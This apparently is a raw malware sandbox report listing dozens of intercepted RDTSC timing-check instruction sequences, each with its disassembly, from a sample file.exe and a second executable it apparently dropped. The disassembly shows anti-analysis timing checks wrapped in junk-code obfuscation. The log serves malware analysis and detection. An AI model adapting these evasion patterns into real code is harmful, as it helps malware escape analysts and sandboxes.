Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02D8 second address: 4CD02E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02E7 second address: 4CD02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02ED second address: 4CD02F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02F1 second address: 4CD039E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F400D373725h 0x00000014 and cx, FCE6h 0x00000019 jmp 00007F400D373721h 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 pushad 0x00000025 call 00007F400D37371Dh 0x0000002a pushfd 0x0000002b jmp 00007F400D373720h 0x00000030 and esi, 256523B8h 0x00000036 jmp 00007F400D37371Bh 0x0000003b popfd 0x0000003c pop ecx 0x0000003d pushfd 0x0000003e jmp 00007F400D373729h 0x00000043 or eax, 115D9E56h 0x00000049 jmp 00007F400D373721h 0x0000004e popfd 0x0000004f popad 0x00000050 mov ebp, esp 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD039E second address: 4CD03A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03A2 second address: 4CD03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD045A second address: 4CD045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD045E second address: 4CD0464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0464 second address: 4CD0499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F400D181C10h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, ax 0x00000017 mov bx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0499 second address: 4CD04AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D37371Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD04F4 second address: 4CD04FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD04FA second address: 4CD0541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F400D37371Bh 0x00000015 and eax, 193E989Eh 0x0000001b jmp 00007F400D373729h 0x00000020 popfd 0x00000021 mov eax, 134B6467h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD05F0 second address: 4CD0625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F400D181C09h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F400D181C0Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0625 second address: 4CD062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD062B second address: 4CD062F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0777 second address: 4CD078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D373721h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD078C second address: 4CD07BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F400D181C0Eh 0x00000013 mov esi, edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, 71D81E03h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0859 second address: 4CD085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD085D second address: 4CD0863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0863 second address: 4CD087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D373725h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD087C second address: 4CD08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F400D181C0Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08A1 second address: 4CD08D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c jmp 00007F400D373726h 0x00000011 dec edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08D0 second address: 4CD08D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08D4 second address: 4CD08DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08DA second address: 4CD08E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D181C0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08E9 second address: 4CD08ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD08ED second address: 4CD097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ebx, dword ptr [edi+01h] 0x0000000b jmp 00007F400D181C15h 0x00000010 mov al, byte ptr [edi+01h] 0x00000013 jmp 00007F400D181C0Eh 0x00000018 inc edi 0x00000019 jmp 00007F400D181C10h 0x0000001e test al, al 0x00000020 pushad 0x00000021 call 00007F400D181C0Dh 0x00000026 pushfd 0x00000027 jmp 00007F400D181C10h 0x0000002c xor eax, 6823F858h 0x00000032 jmp 00007F400D181C0Bh 0x00000037 popfd 0x00000038 pop esi 0x00000039 popad 0x0000003a jne 00007F407E6D9D21h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F400D181C12h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD097E second address: 4CD09FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F400D373724h 0x00000012 jmp 00007F400D373725h 0x00000017 popfd 0x00000018 pushad 0x00000019 mov si, 141Dh 0x0000001d pushfd 0x0000001e jmp 00007F400D37371Ah 0x00000023 add cx, A778h 0x00000028 jmp 00007F400D37371Bh 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 shr ecx, 02h 0x00000033 jmp 00007F400D373726h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD09FF second address: 4CD0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A03 second address: 4CD0A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A09 second address: 4CD0A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F400D181C0Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A31 second address: 4CD0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0A35 second address: 4CD0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0BE6 second address: 4CD0BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0BEC second address: 4CD0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0BF0 second address: 4CD0C21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F400D373725h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0C21 second address: 4CD0C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: B7E94E second address: B7E95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D37371Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: B7E95E second address: B7E963 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CECF6C second address: CECF7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F400D373716h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CECF7A second address: CECF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFF49F second address: CFF4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F400D373724h 0x0000000e jo 00007F400D373716h 0x00000014 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFF737 second address: CFF752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F400D181C14h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFF752 second address: CFF757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFF757 second address: CFF75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFF8B6 second address: CFF8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFFD00 second address: CFFD1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F400D181C11h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFFD1B second address: CFFD3F instructions: 0x00000000 rdtsc 0x00000002 js 00007F400D373716h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F400D373723h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: CFFD3F second address: CFFD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F400D181C08h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D016C0 second address: D016C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D016C5 second address: B7E94E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 763DFBC0h 0x00000010 push ebx 0x00000011 adc si, 1363h 0x00000016 pop ecx 0x00000017 push dword ptr [ebp+122D0649h] 0x0000001d jns 00007F400D181C12h 0x00000023 jo 00007F400D181C0Ch 0x00000029 or edx, dword ptr [ebp+122D2376h] 0x0000002f call dword ptr [ebp+122D2FB6h] 0x00000035 pushad 0x00000036 or dword ptr [ebp+122D242Ch], edi 0x0000003c xor eax, eax 0x0000003e jmp 00007F400D181C17h 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 pushad 0x00000048 movzx eax, dx 0x0000004b jnc 00007F400D181C0Ch 0x00000051 popad 0x00000052 mov dword ptr [ebp+122D2B82h], eax 0x00000058 sub dword ptr [ebp+122D242Ch], eax 0x0000005e mov esi, 0000003Ch 0x00000063 jmp 00007F400D181C17h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c je 00007F400D181C0Ch 0x00000072 sub dword ptr [ebp+122D242Ch], edx 0x00000078 lodsw 0x0000007a pushad 0x0000007b or edi, dword ptr [ebp+122D2B3Eh] 0x00000081 xor dword ptr [ebp+122D2EC1h], ebx 0x00000087 popad 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c stc 0x0000008d clc 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 mov dword ptr [ebp+122D242Ch], edi 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D0176D second address: D01771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01771 second address: D017F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 39F4FEFDh 0x00000012 mov edi, dword ptr [ebp+122D2AA6h] 0x00000018 call 00007F400D181C0Ah 0x0000001d jmp 00007F400D181C0Ah 0x00000022 pop edi 0x00000023 push 00000003h 0x00000025 mov cx, 33DFh 0x00000029 mov ch, 08h 0x0000002b push 00000000h 0x0000002d cld 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F400D181C08h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, edx 0x0000004c mov dword ptr [ebp+122D2FC0h], eax 0x00000052 call 00007F400D181C09h 0x00000057 jmp 00007F400D181C15h 0x0000005c push eax 0x0000005d pushad 0x0000005e pushad 0x0000005f jp 00007F400D181C06h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D017F8 second address: D0180F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F400D373716h 0x00000017 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D0180F second address: D01836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F400D181C0Bh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01836 second address: D01866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007F400D373716h 0x0000000f popad 0x00000010 popad 0x00000011 pop eax 0x00000012 jmp 00007F400D37371Bh 0x00000017 lea ebx, dword ptr [ebp+1245660Eh] 0x0000001d mov dx, di 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F400D373716h 0x0000002a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01976 second address: D01A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F400D181C08h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push esi 0x00000015 jmp 00007F400D181C0Ah 0x0000001a pop esi 0x0000001b jmp 00007F400D181C0Eh 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 jmp 00007F400D181C15h 0x00000029 jnp 00007F400D181C0Ch 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jmp 00007F400D181C19h 0x00000039 pop eax 0x0000003a mov di, 1320h 0x0000003e push 00000003h 0x00000040 push edx 0x00000041 jmp 00007F400D181C11h 0x00000046 pop edx 0x00000047 push 00000000h 0x00000049 mov cl, 97h 0x0000004b push 00000003h 0x0000004d jmp 00007F400D181C18h 0x00000052 push 613576C2h 0x00000057 pushad 0x00000058 jns 00007F400D181C0Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01B2B second address: D01B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 jp 00007F400D37371Ch 0x0000000f or ecx, dword ptr [ebp+122D2AC2h] 0x00000015 push 00000000h 0x00000017 jno 00007F400D37372Ch 0x0000001d call 00007F400D373719h 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F400D373720h 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b popad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01B7F second address: D01B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F400D181C08h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01B92 second address: D01BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F400D37371Bh 0x00000015 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01BB5 second address: D01BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007F400D181C14h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D01BC8 second address: D01BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D229A5 second address: D229B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F400D181C0Eh 0x0000000b rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D229B9 second address: D229D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373724h 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20906 second address: D20917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C0Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20B7B second address: D20B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20B7F second address: D20B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20CD1 second address: D20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373721h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20CE6 second address: D20CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20CF2 second address: D20CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E4B second address: D20E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E53 second address: D20E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E57 second address: D20E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E68 second address: D20E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E6C second address: D20E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20E70 second address: D20E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F400D373716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20FDB second address: D20FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	RDTSC instruction interceptor: First address: D20FE5 second address: D20FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F400D373716h 0x0000000a rdtsc
